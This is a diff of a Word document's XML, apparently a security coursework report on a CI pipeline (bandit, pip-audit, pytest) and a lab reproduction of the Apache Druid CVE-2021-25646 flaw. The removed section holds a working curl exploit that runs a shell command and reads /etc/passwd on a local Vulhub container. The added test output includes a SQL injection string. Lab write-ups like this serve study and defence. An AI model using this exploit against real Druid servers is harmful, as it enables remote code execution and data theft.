-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      - run: pip-audit -r requirements.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      - run: pytest -q</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      - uses: actions/upload-artifact@v4</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        if: always()</w:t>
+        <w:t xml:space="preserve">12 passed in 9.70s</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">GET /api/data without a token -&gt; HTTP 401 (expected 401)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">POST /auth/login -&gt; token issued (147 characters)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">GET /api/data with a token -&gt; HTTP 200 (expected 200)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2869,7 +3177,7 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
-        <w:t xml:space="preserve">        with: {name: security-reports, path: bandit-report.txt}</w:t>
+        <w:t xml:space="preserve">GET /api/data?q=' OR 1=1-- -&gt; HTTP 200 (payload treated as a literal)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2878,7 +3186,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve">The pipeline was reproduced in advance on a clean python:3.11 image, so the expected result of every step is known and the first online run is not a surprise:</w:t>
+        <w:t xml:space="preserve">The last step turns the three machine-readable reports into a written conclusion, which is published in the job log and on the run summary page. This is deliberate: a green tick says that the commands exited with zero, not that anything was actually verified, so the numbers behind the tick are stated explicitly.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2893,22 +3201,122 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
-        <w:t xml:space="preserve">$ bandit -r ./app.py -f txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        Total lines of code: 177</w:t>
+        <w:t xml:space="preserve">## Tests, SAST, and SCA - conclusion</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- bandit (SAST): 0 finding(s) - none</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- pip-audit (SCA): 9 pinned dependencies audited, 0 known vulnerability(ies)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- pytest: 12 tests, 0 failures, 0 errors (9.3 s of test time)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusion: every control held - the build is safe to merge.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The same three commands were also run locally before the first online run, so the expected result of every step was known in advance:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ bandit app.py init_db.py create_user.py -f txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        Total lines of code: 286</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3029,7 +3437,7 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
-        <w:t xml:space="preserve">...........                                              [100%]</w:t>
+        <w:t xml:space="preserve">............                                             [100%]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3044,7 +3452,7 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
-        <w:t xml:space="preserve">11 passed in 6.82s</w:t>
+        <w:t xml:space="preserve">12 passed in 8.57s</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3053,19 +3461,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve">One finding had to be handled during this work. The first run reported B105/B106 - "possible hardcoded password: 'Bearer'" - on the OAuth2 token_type field of the login response, because bandit flags any argument, key or variable whose name contains "token" when it is bound to a string literal. Suppressing the warning with #nosec would have hidden the class of issue the scanner exists to find, so the value was moved into a named constant instead. The warning disappeared and the scan now reports zero skipped lines - which is itself evidence that no finding was silenced.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The run that validated this submission is </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>https://github.com/kanloner/information_security/actions/runs/39367332876</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (commit c36ed02): all nine steps - checkout, Python setup, dependency install, bandit, pip-audit, pytest and the artifact upload - finished green in 35 seconds. The two panels below are taken from that run rather than from a local terminal.</w:t>
+        <w:t xml:space="preserve">One finding had to be handled during this work. The first run reported B105/B106 - "possible hardcoded password: 'Bearer'" - on the OAuth2 token_type field of the login response, because bandit flags any argument, key or variable whose name contains "token" when it is bound to a string literal. Suppressing the warning with #nosec would have hidden the class of issue the scanner exists to find, so the value was moved into a named constant instead. The warning disappeared and the scan reports zero skipped lines - which is itself evidence that no finding was silenced.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3079,120 +3475,14 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="120" w:after="40"/>
         <w:jc w:val="center"/>
+        <w:spacing w:before="120" w:after="40" w:line="240" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:drawing>
-          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-            <wp:extent cx="5577840" cy="3298894"/>
-            <wp:docPr id="9" name="Picture 9"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic>
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic>
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="01-ci-green.png"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5577840" cy="3298894"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect"/>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="595959"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>Figure. GitHub Actions run 39367332876: all nine steps green (SAST, SCA and the test suite)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="40"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-            <wp:extent cx="5577840" cy="4189041"/>
-            <wp:docPr id="3" name="Picture 3"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic>
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic>
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="02-bandit.png"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5577840" cy="4189041"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect"/>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="200"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="595959"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>Figure 3. bandit: No issues identified, 0 lines skipped</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="40"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-            <wp:extent cx="5577840" cy="765413"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5700000" cy="3371142"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="4" name="Picture 4"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks noChangeAspect="1"/>
@@ -3201,11 +3491,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic>
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="03-pip-audit.png"/>
+                    <pic:cNvPr id="4" name="image4.png"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId104"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3213,9 +3503,11 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5577840" cy="765413"/>
+                      <a:ext cx="5700000" cy="3371142"/>
                     </a:xfrm>
-                    <a:prstGeom prst="rect"/>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -3226,16 +3518,142 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="200"/>
+        <w:spacing w:before="0" w:after="200"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:i/>
-          <w:color w:val="595959"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>Figure 4. pip-audit: No known vulnerabilities found</w:t>
+          <w:color w:val="6E6E6E"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">GitHub Actions: Tests, SAST and SCA - all steps green (screenshot 01)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:spacing w:before="120" w:after="40" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5465021" cy="3900000"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="5" name="Picture 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="5" name="image5.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId105"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5465021" cy="3900000"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="6E6E6E"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">bandit: no issues identified, zero skipped lines (screenshot 02)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:spacing w:before="120" w:after="40" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5700000" cy="955819"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="6" name="Picture 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="6" name="image6.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId106"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5700000" cy="955819"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="6E6E6E"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">pip-audit: no known vulnerabilities found (screenshot 03)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Note on the figures: screenshots 01-03 were captured before the job was split into the ten named steps described above, so the labels inside them are shorter than that list. The log quoted in this section is from the current run.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3255,7 +3673,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve">The suite contains eleven tests, each tied to one security property rather than to one function. They run locally with the same command the pipeline uses.</w:t>
+        <w:t xml:space="preserve">The suite contains twelve tests, each tied to one security property rather than to one function. They run locally with the same command the pipeline uses.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3285,7 +3703,7 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
-        <w:t xml:space="preserve">...........                                                    [100%]</w:t>
+        <w:t xml:space="preserve">............                                                   [100%]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3300,7 +3718,7 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
-        <w:t xml:space="preserve">11 passed in 6.73s</w:t>
+        <w:t xml:space="preserve">12 passed in 8.57s</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -3782,6 +4200,44 @@
           </w:p>
         </w:tc>
       </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5200" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">test_create_user_adds_a_working_account</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3870" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">account provisioning + password policy</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
@@ -3791,490 +4247,14 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>7. Vulnerable environment</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>CVE-2021-25646 was selected. It affects Apache Druid up to and including 0.20.0 and is fixed in 0.20.1. The CVSS 3.1 score is 8.8 (High): network reachable, low complexity, no privileges and no user interaction required, with high confidentiality, integrity and availability impact. The weakness class is CWE-732, incorrect permission assignment for a critical resource - a configuration guard that a client can override.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The environment is the Vulhub package for this vulnerability (vulhub/apache-druid/CVE-2021-25646), kept in the repository as cve/CVE-2021-25646/docker-compose.yml so that the experiment is self-contained and does not depend on cloning a third-party repository:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>git clone https://github.com/vulhub/vulhub.git</w:t>
-        <w:br/>
-        <w:t>cd vulhub/apache-druid/CVE-2021-25646</w:t>
-        <w:br/>
-        <w:t>docker compose up -d</w:t>
-        <w:br/>
-        <w:t>docker compose ps          # wait until the container is running (~30 s)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Druid answers on http://127.0.0.1:8888. The container runs the vulnerable image vulhub/apache-druid:0.20.0 and needs no configuration change to be exploitable: the console ships without authentication by default, which is part of the vulnerability.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="40"/>
         <w:jc w:val="center"/>
+        <w:spacing w:before="120" w:after="40" w:line="240" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:drawing>
-          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-            <wp:extent cx="5577840" cy="855795"/>
-            <wp:docPr id="5" name="Picture 5"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic>
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic>
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="04-docker-ps.png"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5577840" cy="855795"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect"/>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="595959"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>Figure. docker compose ps: the vulnerable container vulhub/apache-druid:0.20.0 is running</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>8. Reproducing the attack</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The vulnerable endpoint is POST /druid/indexer/v1/sampler, the API behind the data-ingestion wizard of the Druid console. The payload is a JSON body whose parseSpec declares the javascript format and carries the malicious function - plus the decisive detail, an object with the empty string as a key that re-enables the feature:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>curl -s -X POST http://127.0.0.1:8888/druid/indexer/v1/sampler \</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  -H "Content-Type: application/json" --data '{</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  "type": "index",</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  "spec": { "ioConfig": { "type": "index",</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">      "firehose": {"type":"local","baseDir":"/etc","filter":"passwd"} },</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">    "dataSchema": { "dataSource": "test", "parser": { "parseSpec": {</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">        "format": "javascript",</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">        "function": "function(){var a = new java.util.Scanner(</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">            java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"])</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">            .getInputStream()).useDelimiter(\"\\A\").next();</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">          return {timestamp:123123,test: a}}",</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">        "": {"enabled": "true"}          &lt;- the whole vulnerability</w:t>
-        <w:br/>
